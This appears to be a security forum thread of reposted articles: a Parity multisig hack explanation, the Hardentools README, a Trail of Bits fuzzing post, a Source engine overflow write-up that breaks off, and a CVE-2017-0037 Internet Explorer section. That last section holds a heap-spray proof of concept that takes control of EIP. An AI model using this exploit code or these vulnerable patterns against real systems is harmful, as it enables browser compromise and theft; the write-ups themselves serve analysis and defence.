restoring it to factory settings. Once they did that, they were free to set themselves as the new owners, and then walk out with everything. 2. How did this happen? What follows is a technical explanation of exactly what happened. If you’re not a developer, feel free to skip to the next section, since this is going to be programming-heavy. Ethereum has a fairly unique programming model. On Ethereum, you write code by publishing contracts (which you can think of as objects), and transactions are executed by calling methods on these objects to mutate their state. In order to run code on Ethereum, you need to first deploy the contract (the deployment is itself a transaction), which costs a small amount of Ether. You then need to call methods on the contract to interact with it, which costs more Ether. As you can imagine, this incentivizes a programmer to optimize their code, both to minimize transactions and minimize computation costs. One way to reduce costs is to use libraries. By making your contract call out to a shared library that was deployed at a previous time, you don’t have to re-deploy any shared code. In Ethereum, keeping your code DRY will directly save you money. The default multi-sig wallet in Parity did exactly this. It held a reference to a shared external library which contained wallet initialization logic. This shared library is referenced by the public key of the library contract. // FIELDS address constant _walletLibrary = 0xa657491c1e7f16adb39b9b60e87bbb8d93988bc3; The library is called in several places, via an EVM instruction called DELEGATECALL, which does the following: for whatever method that calls DELEGATECALL, it will call the same method on the contract you're delegating to, but using the context of the current contract. It's essentially like a supercall, except without the inheritance part. (The equivalent in JavaScript would be OtherClass.functionName.apply(this, args).) Here’s an example of this in their multi-sig wallet: the isOwner method just delegates to the shared wallet library's isOwner method, using the current contract's state: function isOwner(address _addr) constant returns (bool) { return _walletLibrary.delegatecall(msg.data); } This is all innocent enough. The multi-sig wallet itself contained all of the right permission checks, and they were sure to rigorously enforce authorization on all sensitive actions related to the wallet’s state. But they made one critical mistake. Solidity allows you to define a “fallback method.” This is the method that gets called when there’s no method that matches a given method name. You define it by not giving it a name: function() { // do stuff here for all unknown methods } The Parity team decided to let any unknown method that sent Ether to the contract just default to depositing the sent Ether. function() payable { // payable is just a keyword that means this method can receive/pay Ether if (msg.value > 0) { // just being sent some cash? Deposit(msg.sender, msg.value); } throw; } But they took it a step further, and herein was their critical mistake. Below is the actual code that was attacked. function() payable { // just being sent some cash? if (msg.value > 0) Deposit(msg.sender, msg.value); else if (msg.data.length > 0) _walletLibrary.delegatecall(msg.data); } Basically: If the method name is not defined on this contract… And there’s no ether being sent in the transaction… And there is some data in the message payload… Then it will call the exact same method if it’s defined in _walletLibrary, but in the context of this contract. Using this, the attacker called a method called initWallet(), which was not defined on the multisig contract but was defined in the shared wallet library: function initWallet(address[] _owners, uint _required, uint _daylimit) { initDaylimit(_daylimit); initMultiowned(_owners, _required); } Which calls the initMultiowned method... function initMultiowned(address[] _owners, uint _required) { m_numOwners = _owners.length + 1; m_owners[1] = uint(msg.sender); m_ownerIndex[uint(msg.sender)] = 1; for (uint i = 0; i < _owners.length; ++i) { m_owners[2 + i] = uint(_owners[i]); m_ownerIndex[uint(_owners[i])] = 2 + i; } m_required = _required; } Do you see what just happened there? The attacker essentially reinitialized the contract by delegating through the library method, overwriting the owners on the original contract. They and whatever array of owners they supply as arguments will be the new owners. Given that they now control the entire wallet, they can trivially extract the remainder of the balance. And that’s precisely what they did. The initWallet: https://etherscan.io/tx/0x707aabc2f24d756480330b75fb4890ef6b8a26ce0554ec80e3d8ab105e63db07 The transfer: https://etherscan.io/tx/0x9654a93939e98ce84f09038b9855b099da38863b3c2e0e04fd59a540de1cb1e5 So what was ultimately the vulnerability? You could argue there were two. First, the initWallet and initMultiowned in the wallet library were not marked as internal (this is like a private method, which would prevent this delegated call), and those methods did not check that the wallet wasn't already initialized. Either check would've made this hack impossible. The second vulnerability was the raw delegateCall. You can think of this as equivalent to a raw eval statement, running on a user-supplied string. In an attempt to be succinct, this contract used metaprogramming to proxy potential method calls to an underlying library. The safer approach here would be to whitelist specific methods that the user is allowed to call. The trouble, of course, is that this is more expensive in gas costs (since it has to evaluate more conditionals). But when it comes to security, we probably have to get over this concern when writing smart contracts that move massive amounts of money. So that was the attack. It was a clever catch, but once you point it out, it seems almost elementary. The attacker then jumped on this vulnerability for three of the largest wallets they could find — but judging from the transaction times, they were doing this entirely manually. The white-hat group was doing this at scale using scripts, and that’s why they were able to beat the attacker to the punch. Given this, it’s unlikely that the attacker was very sophisticated in how they planned their attack. You might ask the question though — why don’t they just roll back this hack, like they did with the DAO hack? Unfortunately that’s not really possible. The DAO hack was unique in that when the attacker drained the DAO into a child DAO, the funds were frozen for many days inside a smart contract before they could be released to the attacker. This prevented any of the stolen funds from going into circulation, so the stolen Ether was effectively siloed. This gave the Ethereum community plenty of time to conduct a public quorum about how to deal with the attack. In this attack, the attacker immediately stole the funds and could start spending them. A hard fork would be impractical–what do you do about all of the transactions that occur downstream? What about the people who innocently traded assets with the attacker? Once the ether they’ve stolen gets laundered and enters general circulation, it’s like counterfeit bills circulating in the economy — it’s easy to stop when it’s all in one briefcase, but once everyone’s potentially holding a counterfeit bill, you can’t really turn back the clock anymore. So the transaction won’t get reversed. The $31M loss stands. It’s a costly, but necessary lesson. So what should we take away from this? 3. What does this attack mean for Ethereum? There are several important takeaways here. First, remember, this was not a flaw in Ethereum or in smart contracts in general. Rather, it was a developer error in a particular contract. So who were the crackpot developers who wrote this? They should’ve known better, right? The developer here was Gavin Wood, one of the co-creators of Ethereum, and the inventor of Solidity, the smart contract programming language. The code was also reviewed by other Parity contributors. This is basically the highest standard of programming that exists in the Ethereum ecosystem. Gavin is human. He made a mistake. And so did the reviewers who audited his code. I’ve read some comments on Reddit and HackerNews along the lines of: “What an obvious mistake! How was it even possible they missed this?” (Ignoring that the “obvious” vulnerability was introduced in January and only now discovered.) When I see responses like this, I know the people commenting are not professional developers. For a serious developer, the reaction is instead: damn, that was a dumb mistake. I’m glad I wasn’t the one who made it. Mistakes of this sort are routinely made in programming. All programs carry the risk of developer error. We have to throw off the mindset of “if they were just more careful, this wouldn’t have happened.” At a certain scale, carefulness is not enough. As programs scale to non-trivial complexity, you have to start taking it as a given that programs are probably not correct. No amount of human diligence or testing is sufficient to prevent all possible bugs. Even organizations like Google or NASA make programming mistakes, despite the extreme rigor they apply to their most critical code. We would do well to take a page from site reliability practices at companies like Google and Airbnb. Whenever there’s a production bug or outage, they do a postmortem analysis and distribute it within the company. In these postmortems, there is always a principle of never blaming individuals. Blaming mistakes on individuals is pointless, because all programmers, no matter how experienced, have a nonzero likelihood of making a mistake.Instead, the purpose of a postmortem is to identify what in the process allowed that mistake to get deployed. The problem was not that Gavin Wood forgot to add internal to the wallet library, or that he did a raw delegateCall without checking what method was being called. The problem is that his programming toolchain allowed him to make these mistakes. As the smart contract ecosystem evolves, it has to evolve in the direction of making these mistakes harder, and that means making contracts secure by default. This leads me to my next point. Strength is a weakness when it comes to programming languages. The stronger and more expressive a programming language is, the more complex its code becomes. Solidity is a very complex language, modeled to resemble Java. Complexity is the enemy of security. Complex programs are more difficult to reason about and harder to identify edge cases for. I think that languages like Viper (maintained by Vitalik Buterin) are a promising step in this direction. Viper includes by default basic security mechanisms, such as bounded looping constructs, no integer overflows, and prevents other basic bugs that developers shouldn’t have to reason about. The less the language lets you do, the easier it is to analyze and prove properties of a contract. Security is hard because the only way to prove a positive statement like “this contract is secure” is to disprove every possible attack vector: “this contract cannot be re-initialized,” “its funds cannot be accessed except by the owners,” etc. The fewer possible attack vectors you have to consider, the easier it is to develop a secure contract. A simpler programming model also allows things like formal verification and automatic test generation. These are areas under active research, but just as smart contracts have incorporated cutting-edge cryptography, they also should start incorporating the leading edge of programming language design. There is a bigger lesson here too. Most of the programmers who are getting into this space, myself included, come from a web development background, and the blockchain toolchain is designed to be familiar for web developers. Solidity has achieved tremendous adoption in the developer community because of its familiarity to other forms of programming. In a way, this may end up being its downfall. The problem is, blockchain programming is fundamentally different from web development. Let me explain. Before the age of the client-server web model, most programming was done for packaged consumer software or on embedded systems. This was before the day of automatic software updates. In these programs, a shipped product was final — you released one form of your software every 6 months, and if there was a bug, that bug would have to stand until the next release. Because of this longer development cycle, all software releases were rigorously tested under all conceivable circumstances. Web development is far more forgiving. When you push bad code to a web server, it’s not a big deal if there’s a critical mistake — you can just roll back the code, or roll forward with a fix, and all is well because you control the server. Or if the worst happens and there’s an active breach or a data leak, you can always stop the bleeding by shutting off your servers and disconnecting yourself from the network. These two development models are fundamentally different. It’s only out of something like web development that you can get the motto “move fast and break things.” Most programmers today are trained on the web development model. Unfortunately, the blockchain security model is more akin to the older model. In blockchain, code is intrinsically unrevertible. Once you deploy a bad smart contract, anyone is free to attack it as long and hard as they can, and there’s no way to take it back if they get to it first. Unless you build intelligent security mechanisms into your contracts, if there’s a bug or successful attack, there’s no way to shut off your servers and fix the mistake. Being on Ethereum by definition means everyone owns your server. A common saying in cybersecurity is “attack is always easier than defense.” Blockchain sharply multiplies this imbalance. It’s far easier to attack because you have access to the code of every contract, know how much money is in it, and can take as long as you want to try to attack it. And once your attack is successful, you can potentially steal all of the money in the contract. Imagine that you were deploying software for vending machines. But instead of a bug allowing you to simply steal candy from one machine, the bug allowed you to simultaneously steal candy from every machine in the world that employed this software. Yeah, that’s how blockchain works. In the case of a successful attack, defense is extremely difficult. The white-hats in the Parity hack demonstrated how limited their defense options were — there was no way to secure or dismantle the contracts, or even to hack back the stolen money; all they could do was hack the remaining vulnerable contracts before the attacker did. This might seem to spell a dark future. But I don’t think this is a death knell for blockchain programming. Rather, it confirms what everyone already knows: this ecosystem is young and immature. It’s going to take a lot of work to develop the training and discipline to treat smart contracts the way that banks treat their ATM software. But we’re going to have to get there for blockchain to be successful in the long run. This means not just programmers maturing and getting more training. It also means developing tools and languages that make all of this easier, and give us rigorous guarantees about our code. It’s still early. Ethereum is a work in progress, and it’s changing rapidly. You should not treat Ethereum as a bank or as a replacement for financial infrastructure. And certainly you should not store any money in a hot walletthat you’re not comfortable losing. But despite all that, I still think Ethereum is going to win in the long run. And here’s why: the developer community in Ethereum is what makes it so powerful. Ethereum will not live or die because of the money in it. It will live or die based on the developers who are fighting for it. The league of white-hats who came together and defended the vulnerable wallets didn’t do it for money. They did it because they believe in this ecosystem. They want Ethereum to thrive. They want to see their vision of the future come true. And after all the speculation and the profiteering, it’s ultimately these people who are going to usher the community into its future. They are fundamentally why Ethereum will win in the long run—or if they abandon Ethereum, their abandonment will be why it loses. This attack is important. It will shake people up. It will force the community to take a long, hard look at security best practices. It will force developers to treat smart contract programming with far more rigor than they currently do. But this attack hasn’t shaken the strength of the builders who are working on this stuff. So in that sense it’s a temporary setback. In the end, attacks like this are good for the community to grow up. They call you to your senses and force you to keep your eyes open. It hurts, and the press will likely make a mess of the story. But every wound makes the community stronger, and gets us closer to really deeply understanding the technology of blockchain — both its dangers, and its amazing potential. P.S. If you’re a dev and you want to learn more about smart contract security, this is a really good resource. Sursa: https://medium.freecodecamp.org/a-hacker-stole-31m-of-ether-how-it-happened-and-what-it-means-for-ethereum-9e5dc29e33ce
      • 1
      • Like
  6. Hardentools Hardentools is a collection of simple utilities designed to disable a number of "features" exposed by operating systems (Microsoft Windows, for now), and primary consumer applications. These features, commonly thought for Enterprise customers, are generally useless to regular users and rather pose as dangers as they are very commonly abused by attackers to execute malicious code on a victim's computer. The intent of this tool is to simply reduce the attack surface by disabling the low-hanging fruit. Hardentools is intended for individuals at risk, who might want an extra level of security at the price of some usability. It is not intended for corporate environments. WARNING: This is just an experiment, it is not meant for public distribution yet. Also, this tool disables a number of features, including of Microsoft Office, Adobe Reader, and Windows, that might cause malfunctions to certain applications. Use this at your own risk. Bear in mind, after running Hardentools you won't be able, for example, to do complex calculations with Microsoft Office Excel or use the Command-line terminal, but those are pretty much the only considerable "downsides" of having a slightly safer Windows environment. Before deciding to use it, make sure you read this document thoroughly and understand that yes, something might break. In case you experience malfunctions as a result of the modifications implemented by this tool, please do let us know. When you're ready, you can find the latest download here. How to use it Once you double-click on the icon, depending on your Windows security settings, you should be prompted with an User Access Control dialog asking you confirmation to allow Hardentools to run. Click "Yes". Then, you will see the main Hardentools window. It's very simple, you just click on the "Harden" button, and the tool will make the changes to your Windows configuration to disable a set of features that are risky. Once completed, you will be asked to restart your computer for all the changes to have full effect. In case you wish to restore the original settings and revert the changes Hardentools made (for example, if you need to use cmd.exe), you can simply re-run the tool and instead of an "Harden" button you will be prompted with a "Restore" button. Similarly, click it and wait for the modifications to be reverted. In the future, we will create the ability to select or deselect certain modifications Hardentools is configured to make. Please note: the modifications made by Hardentools are exclusively contextual to the Windows user account used to run the tool from. In case you want Hardentools to change settings for other Windows users as well, you will have to run it from each one of them logged in. What this tool does NOT It does NOT prevent software from being exploited. It does NOT prevent the abuse of every available risky feature. It is NOT an Antivirus. It does not protect your computer. It doesn't identify, block, or remove any malware. It does NOT prevent the changes it implements from being reverted. If malicious code runs on the system and it is able to restore them, the premise of the tool is defeated, isn't it? Disabled Features Generic Windows Features Disable Windows Script Host. Windows Script Host allows the execution of VBScript and Javascript files on Windows operating systems. This is very commonly used by regular malware (such as ransomware) as well as targeted malware. Disabling AutoRun and AutoPlay. Disables AutoRun / AutoPlay for all devices. For example, this should prevent applicatons from automatically executing when you plug a USB stick into your computer. Disables powershell.exe, powershell_ise.exe and cmd.exe execution via Windows Explorer. You will not be able to use the terminal and it should prevent the use of PowerShell by malicious code trying to infect the system. Sets User Account Control (UAC) to always ask for permission (even on configuration changes only) and to use "secure desktop". Disable file extensions mainly used for malicious purposes. Disables the ".hta", ".js", ".JSE", ".WSH", ".WSF", ".scr", ".vbs" and ".pif" file extensions for the current user (and for system wide defaults, which is only relevant for newly created users). Microsoft Office Disable Macros. Macros are at times used by Microsoft Office users to script and automate certain activities, especially calculations with Microsoft Excel. However, macros are currently a security plague, and they are widely used as a vehicle for compromise. With Hardentools, macros are disabled and the "Enable this Content" notification is disabled too, to prevent users from being tricked. Disable OLE object execution. Microsoft Office applications are able to embed so called "OLE objects" and execute them, at times also automatically (for example through PowerPoint animations). Windows executables, such as spyware, can also be embedded and executed as an object. This is also a security disaster which we observed used time and time again, particularly in attacks against activists in repressed regions. Hardentools entirely disables this functionality. Disabling ActiveX. Disables ActiveX Controls for all Office applications. Acrobat Reader Disable JavaScript in PDF documents. Acrobat Reader allows to execute JavaScript code from within PDF documents. This is widely abused for exploitation and malicious activity. Disable execution of objects embedded in PDF documents. Acrobat Reader also allows to execute embedded objects by opening them. This would normally raise a security alert, but given that legitimate uses of this are rare and limited, Hardentools disables this. Authors This tools is developed by Claudio Guarnieri, Mariano Graziano and Florian Probst. Sursa: https://github.com/securitywithoutborders/hardentools
  7. CVE to PoC - CVE-2017-0037 17 JULY 2017 CVE-2017-0037 Internet Explorer “Microsoft Internet Explorer 10 and 11 and Microsoft Edge have a type confusion issue in the Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement function in mshtml.dll, which allows remote attackers to execute arbitrary code via vectors involving a crafted Cascading Style Sheets (CSS) token sequence and crafted JavaScript code that operates on a TH element.”   The PoC The vulnerability was found by Ivan Fratric of Google Project Zero. The following is the PoC he provided: <!-- saved from url=(0014)about:internet --> <style> .class1 { float: left; column-count: 5; } .class2 { column-span: all; columns: 1px; } table {border-spacing: 0px;} </style> <script> function boom() { document.styleSheets[0].media.mediaText = "aaaaaaaaaaaaaaaaaaaa"; th1.align = "right"; } </script> <body onload="setInterval(boom,100)"> <table cellspacing="0"> <tr class="class1"> <th id="th1" colspan="5" width=0></th> <th class="class2" width=0><div class="class2"></div></th> With a few notes: The PoC crashes in MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement when reading from address 0000007800000070 [...] Edge should crash when reading the same address while 32-bit IE tab process should crash in the same place but when reading a lower address. [...] Let's take a look at the code around the rip of the crash. 00007ffe`8f330a51 488bcd mov rcx,rbp 00007ffe`8f330a54 e8873c64ff call MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable (00007ffe`8e9746e0) 00007ffe`8f330a59 48833800 cmp qword ptr [rax],0 ds:00000078`00000070=???????????????? 00007ffe`8f330a5d 743d je MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0xe7 (00007ffe`8f330a9c) 00007ffe`8f330a5f 488bcd mov rcx,rbp 00007ffe`8f330a62 e8793c64ff call MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable (00007ffe`8e9746e0) 00007ffe`8f330a67 488b30 mov rsi,qword ptr [rax] 00007ffe`8f330a6a 488b06 mov rax,qword ptr [rsi] 00007ffe`8f330a6d 488bb848030000 mov rdi,qword ptr [rax+348h] 00007ffe`8f330a74 488bcf mov rcx,rdi 00007ffe`8f330a77 ff155b95d700 call qword ptr [MSHTML!_guard_check_icall_fptr (00007ffe`900a9fd8)] 00007ffe`8f330a7d 488bce mov rcx,rsi 00007ffe`8f330a80 ffd7 call rdi On 00007ffe`8f330a51 rxc is read from rbp and MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable is called which sets up rax. rcx is supposed to point to another object type, but in the PoC it points to an array of 32-bit integers allocated in Array<Math::SLayoutMeasure>::Create. This array stores offsets of table columns and the values can be controlled by an attacker (with some limitations). On 00007ffe`8f330a59 the crash occurs because rax points to uninitialized memory. However, an attacker can affect rax by modifying table properties such as border-spacing and the width of the firs th element. Let's see what happens if an attacker can point rax to the memory he/she controls. Assuming an attacker can pass a check on line 00007ffe`8f330a59, MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable is called again with the same arguments. After that, through a series of dereferences starting from rax, a function pointer is obtained and stored in rdi. A CFG check is made on that function pointer and, assuming it passes, the attacker-controlled function pointer is called on line 00007ffe`8f330a80. Sounds pretty easy to control that CMP condition if we can perform heap spray and point EAX to some memory location we control. Control EIP First of all let's confirm that the PoC works: (654.eec): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000038 ebx=049f4758 ecx=049f4758 edx=00000002 esi=00000064 edi=5a0097f0 eip=59a15caf esp=0399bd68 ebp=0399bd94 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0xa4: 59a15caf 833800 cmp dword ptr [eax],0 ds:002b:00000038=???????? I played a little bit with the width of that "th" element as suggested by Ivan and found that a value of "2000000" allows us to move the value of EAX to a controlled memory location in the heap spray: 0:018> bu 59a15caf 0:018> g [...] Breakpoint 0 hit eax=03bd86d4 ebx=03bd86c4 ecx=03bd86c4 edx=00000002 esi=00000064 edi=5a005320 eip=59a15caf esp=03f1c1d8 ebp=03f1c204 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206 MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0xa4: 59a15caf 833800 cmp dword ptr [eax],0 ds:002b:03bd86d4=a0949807 (skip the first break) 0:007> g Breakpoint 0 hit eax=0bebc2d8 ebx=04be9ae0 ecx=04be9ae0 edx=00000002 esi=00000064 edi=5a0097f0 eip=59a15caf esp=03f1c1d8 ebp=03f1c204 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206 MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0xa4: 59a15caf 833800 cmp dword ptr [eax],0 ds:002b:0bebc2d8=0e0e0e0e As expected, EAX points to some valid (and controllable) memory location. If the CMP condition is satisfied the vulnerable routine tries to load the vftable of the object located at "0e0e0e0e" and calls the function at +1A4h: 59a15caf 833800 cmp dword ptr [eax],0 59a15cb2 7448 je MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0xf1 (59a15cfc) 59a15cb4 8bcb mov ecx,ebx 59a15cb6 e8ec8181ff call MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::SGridBoxItem> >::Readable (5922dea7) 59a15cbb 8965f0 mov dword ptr [ebp-10h],esp 59a15cbe 8b18 mov ebx,dword ptr [eax] 59a15cc0 8b03 mov eax,dword ptr [ebx] 59a15cc2 8bb8a4010000 mov edi,dword ptr [eax+1A4h] 59a15cc8 8bcf mov ecx,edi 59a15cca ff15ac1f455a call dword ptr [MSHTML!__guard_check_icall_fptr (5a451fac)] 59a15cd0 8bcb mov ecx,ebx 59a15cd2 ffd7 call edi Step by step: 59a15cbe 8b18 mov ebx,dword ptr [eax] ds:002b:0bebc2d8=0e0e0e0e 59a15cc0 8b03 mov eax,dword ptr [ebx] ds:002b:0e0e0e0e=0e0e0e0e 59a15cc2 8bb8a4010000 mov edi,dword ptr [eax+1A4h] ds:002b:0e0e0fb2=41414141 59a15cd2 ffd7 call edi {41414141} The following is a working PoC to set EIP to 41414141 <style> .class1 { float: left; column-count: 5; } .class2 { column-span: all; columns: 1px; } table {border-spacing: 0px;} </style> <script> function boom() { document.styleSheets[0].media.mediaText = "aaaaaaaaaaaaaaaaaaaa"; th1.align = "right"; } </script> <body onload="setInterval(boom,1000)"> <div id="hs"></div> <script> // Heap Spray - DEPS avoid null bytes var hso = document.getElementById("hs"); hso.style.cssText = "display:none"; var junk = unescape("%u0e0e%u0e0e"); while (junk.length < 0x1000) junk += junk; var rop = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc"); var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc"); var xchg = unescape("%u4141%u4141"); // initial EIP control var offset = 0x7c9; // to control eip var data = junk.substring(0,offset) + xchg + rop + shellcode; data += junk.substring(0,0x800-offset-xchg.length-rop.length-shellcode.length); while (data.length < 0x80000) data += data; for (var i = 0; i < 0x350; i++) { var obj = document.createElement("button"); obj.title = data.substring(0,(0x7fb00-2)/2); // 2 null bytes terminator hso.appendChild(obj); } </script> <table cellspacing="0"> <tr class="class1"> <th id="th1" colspan="0" width=2000000></th> <!-- width should control eax contents, should land somewhere in the heap spray --> <th class="class2" width=0><div class="class2"></div></th> Working Exploit It's pretty obvious, we have a memory leak and control of EIP. Chain together CVE-2017-0059 and CVE-2017-0037 and you'll have a working exploit for Windows 7 and IE11... or just wait tomorrow for the full release Claudio Moletta Sursa: https://redr2e.com/cve-to-poc-cve-2017-0037/
  8. A fuzzer and a symbolic executor walk into a cloud POST AUGUST 2, 2016 29 COMMENTS Finding bugs in programs is hard. Automating the process is even harder. We tackled the harder problem and produced two production-quality bug-finding systems: GRR, a high-throughput fuzzer, and PySymEmu (PSE), a binary symbolic executor with support for concrete inputs. From afar, fuzzing is a dumb, brute-force method that works surprisingly well, and symbolic execution is a sophisticated approach, involving theorem provers that decide whether or not a program is “correct.” Through this lens, GRR is the brawn while PSE is the brains. There isn’t a dichotomy though — these tools are complementary, and we use PSE to seed GRR and vice versa. Let’s dive in and see the challenges we faced when designing and building GRR and PSE. GRR, the fastest fuzzer around GRR is a high speed, full-system emulator that we use to fuzz program binaries. A fuzzing “campaign” involves executing a program thousands or millions of times, each time with a different input. The hope is that spamming a program with an overwhelming number of inputs will result in triggering a bug that crashes the program. Note: GRR is pronounced with two fists held in the air During DARPA’s Cyber Grand Challenge, we went web-scale and performed tens of billions of input mutations and program executions — in only 24 hours! Below are the challenges we faced when making this fuzzer, and how we solved those problems. Throughput. Typically, program fuzzing is split into discrete steps. A sample input is given to an input “mutator” which produces input variants. In turn, each variant is separately tested against the program in the hopes that the program will crash or execute new code. GRR internalizes these steps, and while doing so, completely eliminates disk I/O and program analysis ramp-up times, which represent a significant portion of where time is spent during a fuzzing campaign with other common tools. Transparency. Transparency requires that the program being fuzzed cannot observe or interfere with GRR. GRR achieves transparency via perfect isolation. GRR can “host” multiple 32-bit x86 processes in memory within its 64-bit address space. The instructions of each hosted process are dynamically rewritten as they execute, guaranteeing safety while maintaining operational and behavioral transparency. Reproducibility. GRR emulates both the CPU architecture and the operating system, thereby eliminating sources of non-determinism. GRR records program executions, enabling any execution to be faithfully replayed. GRR’s strong determinism and isolation guarantees let us combine the strengths of GRR with the sophistication of PSE. GRR can snapshot a running program, enabling PSE to jump-start symbolic execution from deep within a given program execution. PySymEmu, the PhD of binary symbolic execution Symbolic execution as a subject is hard to penetrate. Symbolic executors “reason about” every path through a program, there’s a theorem prover in there somewhere, and something something… bugs fall out the other end. At a high level, PySymEmu (PSE) is a special kind of CPU emulator: it has a software implementation for almost every hardware instruction. When PSE symbolically executes a binary, what it really does is perform all the ins-and-outs that the hardware would do if the CPU itself was executing the code. PSE explores the relationship between the life and death of programs in an unorthodox scientific experiment CPU instructions operate on registers and memory. Registers are names for super-fast but small data storage units. Typically, registers hold four to eight bytes of data. Memory on the other hand can be huge; for a 32-bit program, up to 4 GiB of memory can be addressed. PSE’s instruction simulators operate on registers and memory too, but they can do more than just store “raw” bytes — they can store expressions. A program that consumes some input will generally do the same thing every time it executes. This happens because that “concrete” input will trigger the same conditions in the code, and cause the same loops to merry-go-round. PSE operates on symbolic input bytes: free variables that can initially take on any value. A fully symbolic input can be any input and therefore represents all inputs. As PSE emulates the CPU, if-then-else conditions impose constraints on the originally unconstrained input symbols. An if-then-else condition that asks “is input byte B less than 10” will constrain the symbol for B to be in the range [0, 10) along the true path, and to be in the range [10, 256) along the false path. If-then-elses are like forks in the road when executing a program. At each such fork, PSE will ask its theorem prover: “if I follow the path down one of the prongs of the fork, then are there still inputs that satisfy the additional constraints imposed by that path?” PSE will follow each yay path separately, and ignore the nays. So, what challenges did we face when creating and extending PSE? Comprehensiveness. Arbitrary program binaries can exercise any one of thousands of the instructions available to x86 CPUs. PSE implements simulation functions for hundreds of x86 instructions. PSE falls back onto a custom, single-instruction “micro-executor” in those cases where an instruction emulation is not or cannot be provided. In practice, this setup enables PSE to comprehensively emulate the entire CPU. Scale. Symbolic executors try to follow all feasible paths through a program by forking at every if-then-else condition, and constraining the symbols one way or another along each path. In practice, there are an exponential number of possible paths through a program. PSE handles the scalability problem by selecting the best path to execute for the given execution goal, and by distributing the program state space exploration process across multiple machines. Memory. Symbolic execution produces expressions representing simple operations like adding two symbolic numbers together, or constraining the possible values of a symbol down one path of an if-then-else code block. PSE gracefully handles the case where addresses pointing into memory are symbolic. Memory accessed via a symbolic address can potentially point anywhere — even point to “good” and “bad” (i.e. unmapped) memory. Extensibility. PSE is written using the Python programming language, which makes it easy to hack on. However, modifying a symbolic executor can be challenging — it can be hard to know where to make a change, and how to get the right visibility into the data that will make the change a success. PSE includes smart extension points that we’ve successfully used for supporting concolic execution and exploit generation. Measuring excellence So how do GRR and PSE compare to the best publicly available tools? GRR GRR is both a dynamic binary translator and fuzzer, and so it’s apt to compare it to AFLPIN, a hybrid of the AFL fuzzer and Intel’s PIN dynamic binary translator. During the Cyber Grand Challenge, DARPA helpfully provided a tutorial on how to use PIN with DECREE binaries. At the time, we benchmarked PIN and found that, before we even started optimizing GRR, it was already twice as fast as PIN! The more important comparison metric is in terms of bug-finding. AFL’s mutation engine is smart and effective, especially in terms of how it chooses the next input to mutate. GRR internalizes Radamsa, another too-smart mutation engine, as one of its many input mutators. Eventually we may also integrate AFL’s mutators. During the qualifying event, GRR went face-to-face with AFL, which was integrated into the Driller bug-finding system. Our combination of GRR+PSE found more bugs. Beyond this one data point, a head-to-head comparison would be challenging and time-consuming. PySymEmu PSE can be most readily compared with KLEE, a symbolic executor of LLVM bitcode, or the angr binary analysis platform. LLVM bitcode is a far cry from x86 instructions, so it’s an apples-to-oranges comparison. Luckily we have McSema, our open-source and actively maintained x86-to-LLVM bitcode translator. Our experiences with KLEE have been mostly negative; it’s hard to use, hard to hack on, and it only works well on bitcode produced by the Clang compiler. Angr uses a customized version of the Valgrind VEX intermediate representation. Using VEX enables angr to work on many different platforms and architectures. Many of the angr examples involve reverse engineering CTF challenges instead of exploitation challenges. These RE problems often require manual intervention or state knowledge to proceed. PSE is designed to try to crash the program at every possible emulated instruction. For example PSE will use its knowledge of symbolic memory to access any possible invalid array-like memory accesses instead of just trying to solve for reaching unconstrained paths. During the qualifying event, angr went face-to-face with GRR+PSE and we found more bugs. Since then, we have improved PSE to support user interaction, concrete and concolic execution, and taint tracking. I’ll be back! Automating the discovery of bugs in real programs is hard. We tackled this challenge by developing two production-quality bug-finding tools: GRR and PySymEmu. GRR and PySymEmu have been a topic of discussion in recent presentations about our CRS, and we suspect that these tools may be seen again in the near future. By Peter Goodman Sursa: https://blog.trailofbits.com/2016/08/02/engineering-solutions-to-hard-program-analysis-problems/
  9. Remote Code Execution In Source Games Valve's Source SDK contained a buffer overflow vulnerability which allowed remote code execution on clients and servers. The vulnerability was exploited by fragging a player, which casued a specially crafted ragdoll model to be loaded. Multiple Source games were updated during the month of June 2017 to fix the vulnerability. Titles included CS:GO, TF2, Hl2:DM, Portal 2, and L4D2. We thank Valve for being very responsive and taking care of vulnerabilites swiftly. Valve patched and released updates for their more popular titles within a day. Missing Bounds Check The function nexttoken is used to tokenize a string. Note how the buffer str is copied into the buffer token, as long as a NULL character or the delimieter character sep is not found. No bounds checking is performed. View source on GitHub. const char *nexttoken(char *token, const char *str, char sep) { ... while ((*str != sep) && (*str != '\0')) { *token++ = *str++; } ... } The Vulnerability The method ParseKeyValue of class CRagdollCollisionRulesParse is called when processing ragdoll model data, such as when a player is fragged. This method calls nexttoken to tokenize the rule for further processing. By supplying a collisionpair rule longer then 256 characters, the buffer szToken can be overflowed. Since szToken is stored on the stack, the return address of the ParseKeyValue method can be overwritten. View source on GitHub. class CRagdollCollisionRulesParse : public IVPhysicsKeyHandler { virtual void ParseKeyValue( void *pData, const char *pKey, const char *pValue ) { ... else if ( !strcmpi( pKey, "collisionpair" ) ) ... char szToken[256]; const char *pStr = nexttoken(szToken, 